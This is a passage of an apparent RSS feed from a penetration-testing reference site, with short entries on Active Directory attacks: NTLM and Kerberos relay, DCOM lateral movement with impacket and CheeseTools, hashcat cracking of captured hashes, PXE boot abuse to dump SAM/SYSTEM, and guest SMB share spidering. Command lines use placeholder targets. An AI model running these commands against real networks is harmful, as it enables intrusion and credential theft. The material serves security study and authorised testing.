&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;relayinformer&lt;/span&gt; &lt;span class="n"&gt;mssql&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-target&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;USER&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-password&lt;/span&gt; &lt;span class="n"&gt;PASSWORD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;relayinformer&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-url&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;10&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;page&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;USER&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-password&lt;/span&gt; &lt;span class="n"&gt;PASSWORD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;relayinformer&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-method&lt;/span&gt; &lt;span class="n"&gt;BOTH&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;USER&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-password&lt;/span&gt; &lt;span class="n"&gt;PASSWORD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;relayinformer&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-method&lt;/span&gt; &lt;span class="n"&gt;LDAPS&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;USER&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-password&lt;/span&gt; &lt;span class="n"&gt;PASSWORD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;EPA Values&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Disabled / Never&lt;/td&gt;
 &lt;td&gt;You should generally be able to target with NTLM relay, regardless of the client&amp;rsquo;s support for EPA or version of NTLM being used.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Allowed / Accepted / When Supported&lt;/td&gt;
 &lt;td&gt;You can theoretically conduct an NTLM relay but common relay scenarios will not work because standard coercion / poisoning techniques (mentioned above) will result in the addition of EPA-relevant AV pairs, indicating the client’s support for EPA.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Required&lt;/td&gt;
 &lt;td&gt;NTLM relay should be prevented by validation of values provided in EPA-relevant AV pairs.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="webclient-service" class="anchored-heading"&gt;WebClient Service&lt;a class="heading-anchor" href="#webclient-service" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;On Windows workstations, the WebClient service is installed by default.&lt;/li&gt;
&lt;li&gt;On Windows servers, it is not installed by default&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Enable WebClient&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Internal - DCOM</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/internal-dcom/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/internal-dcom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/fortra/impacket/blob/master/examples/dcomexec.py"&gt;impacket/dcomexec.py&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;dcomexec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-h&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-share&lt;/span&gt; &lt;span class="n"&gt;SHARE&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-nooutput&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-ts&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-debug&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-codec&lt;/span&gt; &lt;span class="n"&gt;CODEC&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-object&lt;/span&gt; &lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="n"&gt;ShellWindows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;ShellBrowserWindow&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;MMC20&lt;/span&gt;&lt;span class="p"&gt;}]]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-hashes&lt;/span&gt; &lt;span class="n"&gt;LMHASH&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;NTHASH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-no-pass&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-k&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-aesKey&lt;/span&gt; &lt;span class="n"&gt;hex&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt; &lt;span class="n"&gt;address&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-A&lt;/span&gt; &lt;span class="n"&gt;authfile&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;-keytab&lt;/span&gt; &lt;span class="n"&gt;KEYTAB&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;command ...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;dcomexec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-share&lt;/span&gt; &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;-object&lt;/span&gt; &lt;span class="n"&gt;MMC20&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;DOMAIN&amp;gt;/&amp;lt;USERNAME&amp;gt;:&amp;lt;PASSWORD&amp;gt;@&amp;lt;MACHINE_CIBLE&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;dcomexec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-share&lt;/span&gt; &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;-object&lt;/span&gt; &lt;span class="n"&gt;MMC20&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;DOMAIN&amp;gt;/&amp;lt;USERNAME&amp;gt;:&amp;lt;PASSWORD&amp;gt;@&amp;lt;MACHINE_CIBLE&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;ipconfig&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;dcomexec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-object&lt;/span&gt; &lt;span class="n"&gt;MMC20&lt;/span&gt; &lt;span class="n"&gt;-silentcommand&lt;/span&gt; &lt;span class="n"&gt;-debug&lt;/span&gt; &lt;span class="nv"&gt;$DOMAIN&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;$USER&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="nv"&gt;$PASSWORD&lt;/span&gt;&lt;span class="p"&gt;\$@&lt;/span&gt;&lt;span class="nv"&gt;$HOST&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;notepad.exe&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# -object MMC20 specifies that we wish to instantiate the MMC20.Application object.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# -silentcommand executes the command without attempting to retrieve the output.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/klezVirus/CheeseTools"&gt;klezVirus/CheeseTools&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;-t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-target&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;VALUE&lt;/span&gt; &lt;span class="n"&gt;Target&lt;/span&gt; &lt;span class="n"&gt;Machine&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;-b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-binary&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;VALUE&lt;/span&gt; &lt;span class="n"&gt;Binary&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;-a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-args&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;VALUE&lt;/span&gt; &lt;span class="n"&gt;Arguments&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;-enc&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;blah&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;-m&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-method&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;VALUE&lt;/span&gt; &lt;span class="n"&gt;Methods&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;MMC20Application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellWindows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;ShellBrowserWindow&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ExcelDDE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;VisioAddonEx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;OutlookShellEx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ExcelXLL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;VisioExecLine&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;OfficeMacro&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;-r&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-registry&lt;/span&gt; &lt;span class="n"&gt;Enable&lt;/span&gt; &lt;span class="n"&gt;registry&lt;/span&gt; &lt;span class="n"&gt;manipulation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;-h&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;-?,&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-help&lt;/span&gt; &lt;span class="n"&gt;Show&lt;/span&gt; &lt;span class="n"&gt;Help&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Current&lt;/span&gt; &lt;span class="n"&gt;Methods&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;MMC20&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellWindows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellBrowserWindow&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ExcelDDE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;VisioAddonEx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;OutlookShellEx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ExcelXLL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;VisioExecLine&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;OfficeMacro&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1"&gt;rvrsh3ll/Misc-Powershell-Scripts/Invoke-DCOM.ps1&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Internal - Kerberos Relay</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/internal-relay-kerberos/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/internal-relay-kerberos/</guid><description>&lt;h2 id="kerberos-relay-over-http" class="anchored-heading"&gt;Kerberos Relay over HTTP&lt;a class="heading-anchor" href="#kerberos-relay-over-http" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Kerberos authentication for services without signing&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;HTTP through multicast poisoning (LLMNR)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An attacker sets up an LLMNR poisoner on the multicast range.&lt;/li&gt;
&lt;li&gt;An HTTP client on the multicast range fails to resolve a hostname. This can happen because of a typo in a browser, a misconfiguration, but this can also be triggered by an attacker via WebDav coercion.&lt;/li&gt;
&lt;li&gt;The LLMNR poisoner indicates that the hostname resolves to the attacker’s machine. In the LLMNR response, the answer name differs from the query and corresponds to an arbitrary relay target.&lt;/li&gt;
&lt;li&gt;The victim performs a request on the attacker web server, which requires Kerberos authentication.&lt;/li&gt;
&lt;li&gt;The victim asks for a ST with the SPN of the relay target. It then sends the resulting AP-REQ to the attacker web server.&lt;/li&gt;
&lt;li&gt;The attacker extracts the AP-REQ and relays it to a service of the relay target.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: ESC8 with Kerberos Relay&lt;/p&gt;</description></item><item><title>Internal - NTLM Relay</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/internal-relay-ntlm/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/internal-relay-ntlm/</guid><description>&lt;p&gt;NTLMv1 and NTLMv2 can be relayed to connect to another machine.&lt;/p&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Hash&lt;/th&gt;
 &lt;th&gt;Hashcat&lt;/th&gt;
 &lt;th&gt;Attack method&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;LM&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;3000&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;crack/pass the hash&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;NTLM/NTHash&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;1000&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;crack/pass the hash&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;NTLMv1/Net-NTLMv1&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;5500&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;crack/relay attack&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;NTLMv2/Net-NTLMv2&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;5600&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;crack/relay attack&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Crack the hash with &lt;code&gt;hashcat&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hashcat&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="mf"&gt;5600&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="mf"&gt;0&lt;/span&gt; &lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="n"&gt;crackstation&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="ms08-068-ntlm-reflection" class="anchored-heading"&gt;MS08-068 NTLM reflection&lt;a class="heading-anchor" href="#ms08-068-ntlm-reflection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.&lt;/p&gt;</description></item><item><title>Internal - PXE Boot Image</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/internal-pxe-boot-image/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/internal-pxe-boot-image/</guid><description>&lt;p&gt;PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Press &lt;strong&gt;[F8]&lt;/strong&gt; during the PXE boot to spawn an administrator console on the deployed machine.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Press &lt;strong&gt;[SHIFT+F10]&lt;/strong&gt; during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry.&lt;/p&gt;</description></item><item><title>Internal - Shares</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/internal-shares/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/internal-shares/</guid><description>&lt;h2 id="read-permission" class="anchored-heading"&gt;READ Permission&lt;a class="heading-anchor" href="#read-permission" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Some shares can be accessible without authentication, explore them to find some juicy files&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/Pennyw0rth/NetExec"&gt;Pennyw0rth/NetExec&lt;/a&gt; - The Network Execution Tool&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxc&lt;/span&gt; &lt;span class="n"&gt;smb&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;4&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;guest&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="n"&gt;spider_plus&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxc&lt;/span&gt; &lt;span class="n"&gt;smb&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;4&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;guest&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-get&lt;/span&gt;&lt;span class="o"&gt;-file&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="n"&gt;infos&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-share&lt;/span&gt; &lt;span class="n"&gt;OPENSHARE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/ShawnDEvans/smbmap"&gt;ShawnDEvans/smbmap&lt;/a&gt; - a handy SMB enumeration tool&lt;/p&gt;
